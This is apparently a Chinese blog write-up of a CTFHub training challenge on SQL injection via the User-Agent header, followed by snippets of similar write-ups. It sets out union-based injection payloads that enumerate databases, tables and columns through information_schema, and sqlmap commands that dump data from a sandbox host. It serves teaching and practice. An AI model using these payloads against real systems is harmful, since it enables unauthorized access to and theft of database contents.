CTFHUB-技能树-Web题-SQL注入-Mysql结构-UA注入

原创 已于 2024-05-09 21:13:59 修改 · 837 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #mysql #数据库

于 2024-04-08 21:27:32 首次发布
本文详细描述了如何通过User-Agent注入进行SQL注入攻击,包括手工抓包判断注入点、确定字段数、回显字段数,以及使用sqlmap工具爆破数据库名、表名、列名和数据的过程。

技能树-Web题-SQL注入-Mysql结构-UA注入

文章目录

UA注入

UA注入,即User-Agent注入

手工注入

利用bp抓包,发送至repeater进行判断

看提示

在这里插入图片描述

注入点在User-Agent

虽然有提示,在此还是按常规进行一下注入点判断吧

判断注入点
抓包后,输入1 and 1=1 有回显

在这里插入图片描述

输入 1 and 1=2 无回显

在这里插入图片描述

由此判断,此处为注入点

判断字段数
1 order by 3 无回显

在这里插入图片描述

1 order by 2 有回显

在这里插入图片描述

由此判断,表中有两个字段

判断回显字段数
-1 union select 1,2

在这里插入图片描述

1,2都回显,由此判断可回显字段数为2

爆库名
-1 union select user(),database()

在这里插入图片描述

得到数据库名为sqli

爆表名
-1 union select user(),group_concat(table_name) from information_schema.tables where table_schema=database()

在这里插入图片描述

得到两个表名,尝试查看第一个表中的数据

爆列名
-1 union select user(),group_concat(column_name) from information_schema.columns where table_name='pqqvoicejs'

在这里插入图片描述

得到列名xwprqxhxjd

爆数据

-1 union select user(),group_concat(xwprqxhxjd) from sqli.pqqvoicejs

在这里插入图片描述

得到flag

sqlmap

UA注入 需要用到leve 3

爆库
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/ -level 3 --dbs --batch

在这里插入图片描述

爆表
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/  --level 3 -D sqli --tables --batch

在这里插入图片描述

爆列名
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/  --level 3 -D sqli -T zcvvebogfz --columns  --batch

在这里插入图片描述

爆数据
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/  --level 3 -D sqli -T zcvvebogfz -C glotmiduat --dump --batch

在这里插入图片描述

CTFHub技能树WEBUA注入
weixin_48799157的博客
03-20 2506
小白一个,如有错误请指正! UA就是User-Agent的缩写,中文名为用户代理,是Http协议中的一部分,属于头域的组成部分,它是一个特殊字符串头,是一种向访问网站提供你所使用的浏览器类型及版本、操作系统及版本、浏览器内核、等信息的标识。通过这个标识,用户所访问的网站可以显示不同的排版从而为用户提供更好的体验或者进行信息统计。 个人感觉UA注入和Cookie注入是有点像的,都是从请求头中修改参数,payload和普通的union注入是一样的。 解法一: Burps...
CTFHUB-技能树-WEB-SQL注入
慢就是快
04-16 652
文章目录1.整数型注入2.字符型注入3.报错注入4.布尔注入5.时间盲注5.MYSQL结构6.Cookie 注入7.UA注入8.Referer注入9.过滤空格 1.整数型注入 ?id=-1 order by 2 --+ true # 两个字段 ?id=-1 order by 3 --+ false ?id=-1 union select 1,2 --+ --+ #说明存在两个显示位置,id=-1是为了将显示位置腾空,方便回显数据显示 id=-1 union select 1,group_concat(s
ctfhub UA注入
plant1234的博客
06-18 644
UA注入: 首先更具目知道这道目的 传参点是在User-Agent 所以里bp抓包得到更改User-Agent为1得到: 在利用: 1’ 1’ and 1=1 # 1 and 1=1 1 and 1=2 去测试是否有注入得到: 得到这是有注入的,于是在利用语句: 1 order by 1 1 order by 2 1 order by 3 得到有两个字段 在利用语句: 520 union select 1,2 得出注入点: 这是1,2两个位置都能注入 于是报出库名: 520 u
CTFHub SQL注入通关笔记6:MySQL结构(手注法+脚本法)
最新发布
mooyuan的网络安全博客
10-08 852
本文通过两种方法(手注法+脚本法)对“CTFHub平台 SQL注入-MySQL结构”关卡进行渗透实战。首先介绍了MySQL系统数据库(information_schema、mysql、performance_schema)在注入攻击中的关键作用,以及常用内置函数(database()、version()等)。然后分步骤演示了手工注入方法:从识别注入点、确定列数、定位回显位,到获取数据库名、表名和字段名,最终提取目标数据。文章同样使用sqlmap工具自动化完成注入的完整流程,系统讲解参数的设置并对结果进行分。
CTFHUB技能树SQL——UA注入
weixin_73049307的博客
10-18 921
看样子可能不在数据库中,老样子,改成-1 union select 1,2#上来就是User-Agent报文头,说明是根据UA头的内容来进行查询的。(这里因为是UA注入,所以需要将level调成3以上)得知pffuearwed表和news表。回显错误,说明是整数型注入。得知wdgoyxkhto列。回显错误,说明字段数是2。得知数据库名是sqli。
CTFHub-UA注入
m0_51589948的博客
05-19 588
** UA注入** 根据提示寻找User-Agent,对其进行bp抓包,并发包到repeater 对UA进行注入判断 -1 union select 1,2 在注入后回显并显示内容,判断为Cookie注入,按照正常的注入流程获取flag -1 union select database(),1 查库名 然后查询数据库的表名 -1 union select 1,group select(table_name) feom information_schema.table where table
CTFHub - UA注入
Have_a_great_day的博客
09-11 819
其中UA注入则是一种特定的SQL注入形式,它利用了应用程序中使用的UA来进行攻击。table_name='gnihfyuxxz' :选择表名为【gnihfyuxxz】的表的数据。table_schema=database() :选择当前连接的数据库(sqli)中的所有表。可以发现此处没有【flag】表,取而代之的是【gnihfyuxxz】,查看该表中的列名。此UA注入,所以我们利用bp进行抓包,找到数据包内的UA进行注入。【news】表一直都存在,所以第一想法先不考虑此表中的内容。
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 1043
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 2653
数据库注入
CTFHUB-web-SQL注入
ookami6497的博客
11-29 1069
CTFHUB SQL
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7983
Web 目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHub | UA注入
尼泊罗河伯的博客
11-23 2355
根据目显示内容,此和上一一致,需要在 UA 请求头中进行 SQL 注入。使用 burp suite 抓包工具抓取目网站的信息,直接在 UA 请求中使用 payload 进行测试,发现此存在 UA 注入。那么直接根据注入流程进行注入,最后发现此 flag 存在于 klsedpegmy 数据中。
CTFHub | MySQL结构
尼泊罗河伯的博客
11-13 2347
根据网页显示内容输入1进行测试,此可能存在 SQL 注入。此与前一类似,这次使用手工注入。先判断是否存在注入,发现存在注入后检查注入点。判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看全部数据库名,并查看这些数据库的表名,最后在lvlbiqemvj 表中的数据发现此 flag 。
CTFHub-web(MySQL结构)
分享与记录
08-21 3110
1. 输入一个1,发现有两个注入点 2. 验证这两个注入点 0 union select 1,2 3. 从注入点得到数据库信息和数据库版本 0 union select database(),version() 4. 查询sqli数据库中的表 0 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' 5. 查询表中的字段 0 union select
CTFHubua注入及知识点
2401_86760082的博客
01-17 308
ua注入、知识点、手工注入sqlmap注入
ctfhub技能树SQL注入UA注入
Naptmn的博客
02-07 503
不会真的只有我不知道UA指的是user-agent吧 首先先看一下什么是UA 如果大伙写过爬虫应该很熟悉加入的那个header,那个便是UA,在HTTP的请求头中 可以参考这个文章 https://www.jianshu.com/p/c5cf6a1967d1 那么这个也告诉了,注入点在UA这里,那么我们bp抓包,放入repeater,开始注入!! 1、寻找回显位点 2、数据库名 3、表名 4、列名 5、看里面的数据 得到flag ...
CTFHUB-WEB-SQL注入-UA注入
weixin_43486981的博客
08-11 945
注入点在User-Agent。 目: 靶机环境:直接提示输入点在User-Agent 使用burp suite抓包,注入点在User-Agent 查看显示位 求数据库名 求表名 求列名 求字段值,得到flag
CTFHUB-SQL注入-UA注入
weixin_68416970的博客
07-22 625
CTFHUB技能树SQL注入UA注入的通关教程
CTFHUB-UA注入
Web学习之路
03-28 235
user-agent
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值